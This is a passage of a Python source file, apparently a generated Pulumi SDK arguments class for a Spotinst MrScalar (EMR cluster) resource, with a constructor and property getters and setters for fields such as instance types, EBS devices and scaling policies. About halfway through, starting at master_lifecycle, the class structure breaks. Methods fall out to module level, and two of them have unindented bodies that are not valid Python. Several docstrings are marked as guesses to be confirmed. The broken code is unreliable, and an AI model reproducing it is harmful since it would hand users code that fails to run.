        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
        :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
        :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
        :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
        :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
        :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
        """
        # Only explicitly supplied (non-None) values are recorded on the state
        # object; unset fields are omitted entirely rather than stored as None.
        if additional_info is not None:
            pulumi.set(__self__, "additional_info", additional_info)
        if additional_primary_security_groups is not None:
            pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
        if additional_replica_security_groups is not None:
            pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
        if applications is not None:
            pulumi.set(__self__, "applications", applications)
        if availability_zones is not None:
            pulumi.set(__self__, "availability_zones", availability_zones)
        if bootstrap_actions_files is not None:
            pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
        if cluster_id is not None:
            pulumi.set(__self__, "cluster_id", cluster_id)
        if configurations_files is not None:
            pulumi.set(__self__, "configurations_files", configurations_files)
        if core_desired_capacity is not None:
            pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
        if core_ebs_block_devices is not None:
            pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
        if core_ebs_optimized is not None:
            pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
        if core_instance_types is not None:
            pulumi.set(__self__, "core_instance_types", core_instance_types)
        if core_lifecycle is not None:
            pulumi.set(__self__, "core_lifecycle", core_lifecycle)
        if core_max_size is not None:
            pulumi.set(__self__, "core_max_size", core_max_size)
        if core_min_size is not None:
            pulumi.set(__self__, "core_min_size", core_min_size)
        if core_scaling_down_policies is not None:
            pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
        if core_scaling_up_policies is not None:
            pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
        if core_unit is not None:
            pulumi.set(__self__, "core_unit", core_unit)
        if custom_ami_id is not None:
            pulumi.set(__self__, "custom_ami_id", custom_ami_id)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if ebs_root_volume_size is not None:
            pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
        if ec2_key_name is not None:
            pulumi.set(__self__, "ec2_key_name", ec2_key_name)
        if expose_cluster_id is not None:
            pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
        if instance_weights is not None:
            pulumi.set(__self__, "instance_weights", instance_weights)
        if job_flow_role is not None:
            pulumi.set(__self__, "job_flow_role", job_flow_role)
        if keep_job_flow_alive is not None:
            pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
        if log_uri is not None:
            pulumi.set(__self__, "log_uri", log_uri)
        if managed_primary_security_group is not None:
            pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
        if managed_replica_security_group is not None:
            pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
        if master_ebs_block_devices is not None:
            pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
        if master_ebs_optimized is not None:
            pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
        if master_instance_types is not None:
            pulumi.set(__self__, "master_instance_types", master_instance_types)
        if master_lifecycle is not None:
            pulumi.set(__self__, "master_lifecycle", master_lifecycle)
        if master_target is not None:
            pulumi.set(__self__, "master_target", master_target)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if output_cluster_id is not None:
            pulumi.set(__self__, "output_cluster_id", output_cluster_id)
        if provisioning_timeout is not None:
            pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if release_label is not None:
            pulumi.set(__self__, "release_label", release_label)
        if repo_upgrade_on_boot is not None:
            pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
        if retries is not None:
            pulumi.set(__self__, "retries", retries)
        if scheduled_tasks is not None:
            pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
        if security_config is not None:
            pulumi.set(__self__, "security_config", security_config)
        if service_access_security_group is not None:
            pulumi.set(__self__, "service_access_security_group", service_access_security_group)
        if service_role is not None:
            pulumi.set(__self__, "service_role", service_role)
        if steps_files is not None:
            pulumi.set(__self__, "steps_files", steps_files)
        if strategy is not None:
            pulumi.set(__self__, "strategy", strategy)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if task_desired_capacity is not None:
            pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
        if task_ebs_block_devices is not None:
            pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
        if task_ebs_optimized is not None:
            pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
        if task_instance_types is not None:
            pulumi.set(__self__, "task_instance_types", task_instance_types)
        if task_lifecycle is not None:
            pulumi.set(__self__, "task_lifecycle", task_lifecycle)
        if task_max_size is not None:
            pulumi.set(__self__, "task_max_size", task_max_size)
        if task_min_size is not None:
            pulumi.set(__self__, "task_min_size", task_min_size)
        if task_scaling_down_policies is not None:
            pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
        if task_scaling_up_policies is not None:
            pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
        if task_unit is not None:
            pulumi.set(__self__, "task_unit", task_unit)
        if termination_policies is not None:
            pulumi.set(__self__, "termination_policies", termination_policies)
        if termination_protected is not None:
            pulumi.set(__self__, "termination_protected", termination_protected)
        # Deprecated field: emit the deprecation warning first, then (in a
        # deliberately separate, duplicated check) still record the value so
        # existing callers keep working.
        if visible_to_all_users is not None:
            warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
            pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
        if visible_to_all_users is not None:
            pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
    @property
    @pulumi.getter(name="additionalInfo")
    def additional_info(self) -> Optional[pulumi.Input[str]]:
        """
        This is meta information about third-party applications that third-party vendors use for testing purposes.
        """
        return pulumi.get(self, "additional_info")
    @additional_info.setter
    def additional_info(self, value: Optional[pulumi.Input[str]]):
        """Store ``value`` as the ``additional_info`` input."""
        pulumi.set(self, "additional_info", value)
    @property
    @pulumi.getter(name="additionalPrimarySecurityGroups")
    def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of additional Amazon EC2 security group IDs for the master node.
        """
        return pulumi.get(self, "additional_primary_security_groups")
    @additional_primary_security_groups.setter
    def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "additional_primary_security_groups", value)
    @property
    @pulumi.getter(name="additionalReplicaSecurityGroups")
    def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of additional Amazon EC2 security group IDs for the core and task nodes.
        """
        return pulumi.get(self, "additional_replica_security_groups")
    @additional_replica_security_groups.setter
    def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "additional_replica_security_groups", value)
    @property
    @pulumi.getter
    def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
        """
        A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
        """
        return pulumi.get(self, "applications")
    @applications.setter
    def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
        pulumi.set(self, "applications", value)
    @property
    @pulumi.getter(name="availabilityZones")
    def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of AZs and their subnet Ids. See example above for usage.
        """
        return pulumi.get(self, "availability_zones")
    @availability_zones.setter
    def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "availability_zones", value)
    @property
    @pulumi.getter(name="bootstrapActionsFiles")
    def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
        """
        Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        """
        return pulumi.get(self, "bootstrap_actions_files")
    @bootstrap_actions_files.setter
    def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
        pulumi.set(self, "bootstrap_actions_files", value)
    @property
    @pulumi.getter(name="clusterId")
    def cluster_id(self) -> Optional[pulumi.Input[str]]:
        """
        The MrScaler cluster id.
        """
        return pulumi.get(self, "cluster_id")
    @cluster_id.setter
    def cluster_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_id", value)
    @property
    @pulumi.getter(name="configurationsFiles")
    def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
        """
        Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        """
        return pulumi.get(self, "configurations_files")
    @configurations_files.setter
    def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
        pulumi.set(self, "configurations_files", value)
    @property
    @pulumi.getter(name="coreDesiredCapacity")
    def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
        """
        amount of instances in core group.
        """
        return pulumi.get(self, "core_desired_capacity")
    @core_desired_capacity.setter
    def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "core_desired_capacity", value)
    @property
    @pulumi.getter(name="coreEbsBlockDevices")
    def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
        """
        This determines the ebs configuration for your core group instances. Only a single block is allowed.
        """
        return pulumi.get(self, "core_ebs_block_devices")
    @core_ebs_block_devices.setter
    def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
        pulumi.set(self, "core_ebs_block_devices", value)
    @property
    @pulumi.getter(name="coreEbsOptimized")
    def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
        """
        EBS Optimization setting for instances in group.
        """
        return pulumi.get(self, "core_ebs_optimized")
    @core_ebs_optimized.setter
    def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "core_ebs_optimized", value)
    @property
    @pulumi.getter(name="coreInstanceTypes")
    def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The MrScaler instance types for the core nodes.
        """
        return pulumi.get(self, "core_instance_types")
    @core_instance_types.setter
    def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "core_instance_types", value)
    @property
    @pulumi.getter(name="coreLifecycle")
    def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
        """
        The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        """
        return pulumi.get(self, "core_lifecycle")
    @core_lifecycle.setter
    def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "core_lifecycle", value)
    @property
    @pulumi.getter(name="coreMaxSize")
    def core_max_size(self) -> Optional[pulumi.Input[int]]:
        """
        maximal amount of instances in core group.
        """
        return pulumi.get(self, "core_max_size")
    @core_max_size.setter
    def core_max_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "core_max_size", value)
    @property
    @pulumi.getter(name="coreMinSize")
    def core_min_size(self) -> Optional[pulumi.Input[int]]:
        """
        The minimal amount of instances in core group.
        """
        return pulumi.get(self, "core_min_size")
    @core_min_size.setter
    def core_min_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "core_min_size", value)
    @property
    @pulumi.getter(name="coreScalingDownPolicies")
    def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
        """
        Scaling-down policies for the core group (undocumented upstream;
        description inferred from the attribute name — confirm).
        """
        return pulumi.get(self, "core_scaling_down_policies")
    @core_scaling_down_policies.setter
    def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
        pulumi.set(self, "core_scaling_down_policies", value)
    @property
    @pulumi.getter(name="coreScalingUpPolicies")
    def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
        """
        Scaling-up policies for the core group (undocumented upstream;
        description inferred from the attribute name — confirm).
        """
        return pulumi.get(self, "core_scaling_up_policies")
    @core_scaling_up_policies.setter
    def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
        pulumi.set(self, "core_scaling_up_policies", value)
    @property
    @pulumi.getter(name="coreUnit")
    def core_unit(self) -> Optional[pulumi.Input[str]]:
        """
        Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        """
        return pulumi.get(self, "core_unit")
    @core_unit.setter
    def core_unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "core_unit", value)
    @property
    @pulumi.getter(name="customAmiId")
    def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
        """
        return pulumi.get(self, "custom_ami_id")
    @custom_ami_id.setter
    def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "custom_ami_id", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The MrScaler description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="ebsRootVolumeSize")
    def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
        """
        Size of the EBS root volume (undocumented upstream; description
        inferred from the attribute name — confirm units with provider docs).
        """
        return pulumi.get(self, "ebs_root_volume_size")
    @ebs_root_volume_size.setter
    def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ebs_root_volume_size", value)
    @property
    @pulumi.getter(name="ec2KeyName")
    def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of an Amazon EC2 key pair that can be used to ssh to the master node.
        """
        return pulumi.get(self, "ec2_key_name")
    @ec2_key_name.setter
    def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ec2_key_name", value)
    @property
    @pulumi.getter(name="exposeClusterId")
    def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
        """
        Allow the `cluster_id` to set a provider output variable.
        """
        return pulumi.get(self, "expose_cluster_id")
    @expose_cluster_id.setter
    def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "expose_cluster_id", value)
    @property
    @pulumi.getter(name="instanceWeights")
    def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
        """
        Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
        """
        return pulumi.get(self, "instance_weights")
    @instance_weights.setter
    def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
        pulumi.set(self, "instance_weights", value)
    @property
    @pulumi.getter(name="jobFlowRole")
    def job_flow_role(self) -> Optional[pulumi.Input[str]]:
        """
        The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
        """
        return pulumi.get(self, "job_flow_role")
    @job_flow_role.setter
    def job_flow_role(self, value: Optional[pulumi.Input[str]]):
        """Store ``value`` as the ``job_flow_role`` input."""
        pulumi.set(self, "job_flow_role", value)
    @property
    @pulumi.getter(name="keepJobFlowAlive")
    def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the cluster should remain available after completing all steps.
        """
        return pulumi.get(self, "keep_job_flow_alive")
    @keep_job_flow_alive.setter
    def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "keep_job_flow_alive", value)
    @property
    @pulumi.getter(name="logUri")
    def log_uri(self) -> Optional[pulumi.Input[str]]:
        """
        The path to the Amazon S3 location where logs for this cluster are stored.
        """
        return pulumi.get(self, "log_uri")
    @log_uri.setter
    def log_uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "log_uri", value)
    @property
    @pulumi.getter(name="managedPrimarySecurityGroup")
    def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
        """
        EMR Managed Security group that will be set to the primary instance group.
        """
        return pulumi.get(self, "managed_primary_security_group")
    @managed_primary_security_group.setter
    def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "managed_primary_security_group", value)
    @property
    @pulumi.getter(name="managedReplicaSecurityGroup")
    def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
        """
        EMR Managed Security group that will be set to the replica instance group.
        """
        return pulumi.get(self, "managed_replica_security_group")
    @managed_replica_security_group.setter
    def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "managed_replica_security_group", value)
    @property
    @pulumi.getter(name="masterEbsBlockDevices")
    def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
        """
        This determines the ebs configuration for your master group instances. Only a single block is allowed.
        """
        return pulumi.get(self, "master_ebs_block_devices")
    @master_ebs_block_devices.setter
    def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
        pulumi.set(self, "master_ebs_block_devices", value)
    @property
    @pulumi.getter(name="masterEbsOptimized")
    def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
        """
        EBS Optimization setting for instances in group.
        """
        return pulumi.get(self, "master_ebs_optimized")
    @master_ebs_optimized.setter
    def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "master_ebs_optimized", value)
    @property
    @pulumi.getter(name="masterInstanceTypes")
    def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The MrScaler instance types for the master nodes.
        """
        return pulumi.get(self, "master_instance_types")
    @master_instance_types.setter
    def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    The application name.
    """
    return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
    """Set the application name."""
    pulumi.set(self, "name", value)
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> Optional[pulumi.Input[str]]:
    """
    The ID of the cluster created by this scaler, exposed when `expose_cluster_id`
    is enabled (see the clone-strategy example on the resource class).
    """
    return pulumi.get(self, "output_cluster_id")
@output_cluster_id.setter
def output_cluster_id(self, value: Optional[pulumi.Input[str]]):
    """Set the exposed cluster ID output value."""
    pulumi.set(self, "output_cluster_id", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
    """
    Timeout settings applied while provisioning cluster capacity
    (a `timeout` in minutes plus a `timeout_action`).
    """
    return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
    """Set the capacity provisioning timeout configuration."""
    pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
    """
    The MrScaler region.
    """
    return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
    """Set the MrScaler region."""
    pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
    """
    The EMR release label (for example, `emr-5.17.0`).
    """
    return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
    """Set the EMR release label."""
    pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
    """
    Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
    """
    return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
    """Set the repo-upgrade-on-boot mode (`SECURITY` or `NONE`)."""
    pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
    """
    Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
    """
    return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
    """Set the maximum number of provisioning retries (valid values: 1-5)."""
    pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
    """
    An array of scheduled tasks.
    """
    return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
    """Set the array of scheduled tasks."""
    pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
    """
    The name of the security configuration applied to the cluster.
    """
    return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
    """Set the name of the cluster's security configuration."""
    pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
    """
    The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
    """
    return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
    """Set the EMR service-access security group identifier."""
    pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
    """
    The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
    """
    return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
    """Set the IAM role assumed by the Amazon EMR service."""
    pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
    """
    Steps from S3.
    """
    return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
    """Set the S3 locations of step-definition files."""
    pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input[str]]:
    """
    The MrScaler strategy. Allowed values are `new`, `clone` and `wrap`.
    """
    return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input[str]]):
    """Set the MrScaler strategy (`new`, `clone` or `wrap`)."""
    pulumi.set(self, "strategy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
    """
    A list of tags to assign to the resource. You may define multiple tags.
    """
    return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
    """Set the list of tags assigned to the resource."""
    pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
    """
    The desired amount of instances in the task group.
    """
    return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
    """Set the desired capacity of the task group."""
    pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
    """
    This determines the ebs configuration for your task group instances. Only a single block is allowed.
    """
    return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
    """Set the EBS block device configuration for the task group instances."""
    pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
    """
    EBS Optimization setting for instances in the task group.
    """
    return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
    """Set the EBS optimization flag for the task group."""
    pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """
    The MrScaler instance types for the task nodes.
    """
    return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    """Set the instance types allowed for task nodes."""
    pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
    """
    The MrScaler lifecycle for instances in the task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    """
    return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
    """Set the task group lifecycle ('SPOT' or 'ON_DEMAND')."""
    pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
    """
    The maximal amount of instances in the task group.
    """
    return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
    """Set the maximum size of the task group."""
    pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
    """
    The minimal amount of instances in the task group.
    """
    return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
    """Set the minimum size of the task group."""
    pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
    """
    Policies for scaling the task group down.
    """
    return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
    """Set the scale-down policies for the task group."""
    pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
    """
    Policies for scaling the task group up.
    """
    return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
    """Set the scale-up policies for the task group."""
    pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
    """
    Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
    """
    return pulumi.get(self, "task_unit")
@task_unit.setter
